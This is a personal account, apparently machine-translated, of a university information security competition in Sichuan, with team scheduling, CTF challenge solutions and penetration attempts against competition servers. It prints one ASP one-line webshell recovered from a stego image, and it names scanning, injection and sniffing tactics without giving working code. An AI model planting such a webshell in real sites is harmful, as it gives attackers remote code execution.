Transcript of the third Sichuan information security technology competition

This is also the last time I participated in the provincial competition.

After all, the future competition opportunities will be reserved for children's shoes in lower grades ~

Bytes ---------------------------------------------------------------------------------------------------------------------

Time: May 21 am-pm

Location: CUIT (Chengdu Institute of Information Engineering)

CONTESTANT: (CUIT Team1) blu3boy casperkid hmlttrack (persons in this transcript)

(CUIT Team2) littlefater vccjis xiangshen

39 other high school teams (117)

Because the proportion of penetration questions in the competition is too heavy

Our school team works together (2 penetration direction players + 1 reverse direction players)
Competition introduction:

The computer used for this competition is brought by the contestants themselves.

The topic is provided by lvmeng technology for a total of 200 points

1. Theoretical question 50 points

All are subject to multiple choice questions

Sniffing-Principle

Scan-principles

Cryptographic algorithm-DES Principle

Firewall-concept and Configuration

Reverse Engineering-shelling Application

Buffer overflow-Principle

Denial of Service Attack-Principles of SYN attacks, smurf attacks, pingflood, Teardrop, and LAND attacks

Malicious Code-principles and features of Trojans, viruses, worms, and malicious code on webpages

SQL Injection-Application

Principles of network spoofing-IP Address Spoofing

Log cleanup-Windows, linux

Operating system vulnerabilities-Windows and linux

Operating system security policy configuration-Windows and linux

Network device attack and Security Configuration-routers, switches, etc.

Commonly used doscommands-Ping, nslookup, tracert, etc.

2. Practice Question 50 points

There are 6 types of online key submission questions.

Basic

Web Security

OS

Crack cracking

Overflow

Prog Programming

3. penetration question 100 points

Questions for penetration testing

 

Bronze server environment:

OS: Windows2003

Web Server: IIS 6.0

DataBase: SQL Server 2000

Web Application: hishop5.1

Silver server environment:

OS: Windows2003

Web Server: Apache 2.x

DataBase: MYSQL

Web Application: Korean XpressEngine

Gold medal server environment:

OS: Debian

Start now

Bytes ---------------------------------------------------------------------------------------------------------------------
= Morning =

(7: 20 am)

Struggling to get up

Then, get ready to start today's battle.

As a result, it was still raining.

Wearing a short sleeve is too cold to bring a coat.

Then get up with hmlttrack and go to the lab together.

Two people have no appetite. They just drank porridge in the canteen.

I received a text message from the melon doll.

(8: 10 am)

Go to the lab to split the cddedevil 2 GB memory.

Then I made my computer 4G = ~

Then I sent the contestant a red dress ......

Then move the computer to the competition venue to test the network.

(9: 00 am)

What are group photos taken before the team sign in?

I met adomore from Chengdu University and went back to the competition venue.

We can see that the allocated CIDR block on our seats is an intranet IP address, and it's cool.

It is estimated that the penetration question will not require a rebound connection.

In this case, the question of penetration will be no intranet penetration.

(During preparations, we also simulated various possible Intranet conditions... TAT ~)

I also found that y32asm is sitting behind me ~

(9: 30 am)

Start the competition

Our division of labor is

I and hmlttrack first make theoretical questions

Make half of each question

Blu3boy's bronze server that directly performs penetration questions

It took about 10 minutes to complete the theoretical questions.

Blu3boy also obtained and granted permissions to webshell.

(Before the competition, I did not know the web program version. I only knew that hisdesk5.x was the result. We also dug hisdesk5.40day)

(I thought we could use the game today to open the gap with other teams. Who knows the lowest version of hisdesk5.1... makes us feel the same)

Then start searching for the key file.

Blu3boy found two key files.

I found the bronze file.

From the very beginning, the game soared to 1st = ......

 

Then blu3boy started to engage in silver server again

At first glance, it was a bunch of Korean web programs.

I swept the gold medal server and opened 22 and 23

The server was shut down in about five minutes.

(It seems that some teams are focusing on Penetration questions too early, and the organizer wants the team to make a question first)

We only have to focus on practical issues.

Hmlttrack is mainly responsible for reverse/cracking/programming issues

Blu3boy is mainly responsible for SQL Injection issues

I am mainly responsible for web security issues

 

I don't know what they do. I only remember my own questions ~

Basic Encoding

You can directly perform base64 decryption on the last part of the package.

 

XSS is more impressive than Coding

Is a utf-7 coding question a look at the heart of the bright

During the winter vacation before I went to the ali interview, I was asked to prepare web security related knowledge.

Master asked me to do a small task to understand utf-7-related technologies

Previous notes summary http://hi.baidu.com/hackercasper/blog/item/7b0a1b8188abe5c49023d97a.html

Right after seeing a callback and utf-7 bom, I knew how to do it.

It's just a utf-7 decoding.

But suddenly remembered that there were no tools at hand

Later I remembered that spark once sent me a tool that he wrote to detect xss. XCapture has the function of utf-7 decoding.

Quick after installation

 

Information Hiding is also a pain point

Download an image and use winhex to open the last asp sentence.

Content: <% execute request ("hacker") %>

The sha160-hash obtained by sha1 encryption is the key.

This question does not have much practical significance.

 

Practice is really a pain point

It is different from the topic type listed in the original question outline.

Some types of games in the previous list are not displayed at all.

It's a bit like a guess.

 

The question of a cat catching a mouse

Listen to Team2's teammate vccjis

Is to see the question path http: // xx/3/catch/contains a catch

So we need to think of capturing packets ......

Various blood spray ...... = ~

This has nothing to do with the security feeling in real life.

I just want to guess the dummies in ancient times ......
Next to the previous article == ~

Bytes ---------------------------------------------------------------------------------------------------------------------

= Noon =

 

(12: 00 am)

Go to the instructor canteen for dinner at noon

On the road, I will discuss with my teammates how to divide the remaining questions and penetrate into the upcoming silver medal and gold medal server ideas.

The preparations before the competition have always been an assumption that there will be an intranet. As a result, three servers are all public networks, all of which cause various headaches.

Then I said we could sniff the bronze server again.

Because the 22 on the gold medal server is ssh 1.99 (only the 1.x version seems to be capable of sniffing)

Then we also opened 23, which is telnet. This is clearly feasible for sniffing.

After all, although the three servers are all public networks, they may be able to sniff anything in the same c segment.

Soon after eating, I went to the competition venue to start fighting.

 

(12: 50 am)

Back to the lab, I found that the accounts and webshells of the bronze server were deleted.

It is estimated that other teams are doing bad things.

We only have to take it again.

Then enter the Desktop

Using a self-written arp tool to scan Intranet ip addresses

(Unlike s.exe, which is based on the tcp protocol to scan the port or as if cain is based on winpcap)

Scan and find that the bronze server is isolated.

Not a stepping stone for silver or gold servers

You don't have to worry about it anymore.

 

Bytes ---------------------------------------------------------------------------------------------------------------------

= Afternoon =

 

(1: 00 pm)

Silver server and gold server open

Blu3boy is responsible for silver server (windows2003 + php)

I am in charge of golden server (Linux)

First use Awvs to scan the silver server, at least first clear the web path structure first

One of these paths exposes the absolute web path (my mind is still steadfast)

In addition to South Korea's web programs, phpmyadmin is also scanned.

Then I used nmap to scan both the silver medal and gold medal servers.

The silver server also opened 1433 and 8080

8080 is the default html page of IIS.

I couldn't guess the password even after I got the 1433 password.

Later, we asked blu3boy To Try Search injection and wide byte injection at a high speed.

When testing a page, it seems that compound injection with search type + width byte is somewhat responsive.

Then he tried again. Unfortunately, at the end, he didn't try out any more ~

 

(2: 00 pm)

Hmlttrack's 3rd questions about crack have never been made. The algorithm is too complicated. It takes too much time to do so.

I gave up on other questions.

 

Blu3boy and I are wasting a lot of time

At last, I had to go back and start my practice.

 

I did a log forensics question.

The hacker's IP address is found in the log.

Then 3389

But never know the password